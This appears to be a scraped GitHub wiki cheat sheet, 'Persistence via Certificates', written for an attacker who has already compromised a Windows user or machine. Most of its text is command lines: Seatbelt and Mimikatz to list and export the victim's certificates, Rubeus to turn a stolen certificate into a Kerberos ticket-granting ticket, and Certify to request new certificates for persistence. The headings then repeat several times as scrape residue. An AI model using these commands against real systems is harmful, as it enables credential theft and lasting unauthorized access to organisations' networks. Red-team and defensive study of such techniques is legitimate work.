Scenario is you have compromised a user or computer

Enumerate certificates the victim currently has

Seatbelt

Seatbelt.exe certificates

Mimikatz

mimikatz crypto::certificates
mimikatz crypto::certificates /systemstore:<name> /store:<name>

Export their certificates

Mimikatz

mimikatz crypto::certificates /export
mimikatz crypto::certificates /systemstore:<name> /store:<name> /export
mimikatz crypto::certificates /systemstore:local_machine /export

When exporting with mimikatz the password will be mimikatz
To extract a machine certificate local admin permissions are needed.

Use certificate to get a tgt

Rubeus.exe asktgt /user:<username> /certificate:<base64 of certificate> /password:<password> /nowrap
Rubeus.exe asktgt /user:<machine account>$ /enctype:aes256 /certificate:<base64 of certificate> /password:<password> /nowrap

Request a certificate for the victim

Certify.exe request /ca:<certificate authority> /template:<template name>
Certify.exe request /ca:<certificate authority> /template:<template name> /machine

Persistence via Certificates - CraigDonkin/Infrastructure GitHub Wiki

Enumerate certificates the victim currently has

Seatbelt

Mimikatz

Export their certificates

Mimikatz

Use certificate to get a tgt

Request a certificate for the victim

⚠️ GitHub.com Fallback ⚠️

Persistence via Certificates - CraigDonkin/Infrastructure GitHub Wiki

Enumerate certificates the victim currently has

Seatbelt

Mimikatz

Export their certificates

Mimikatz

Use certificate to get a tgt

Request a certificate for the victim

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️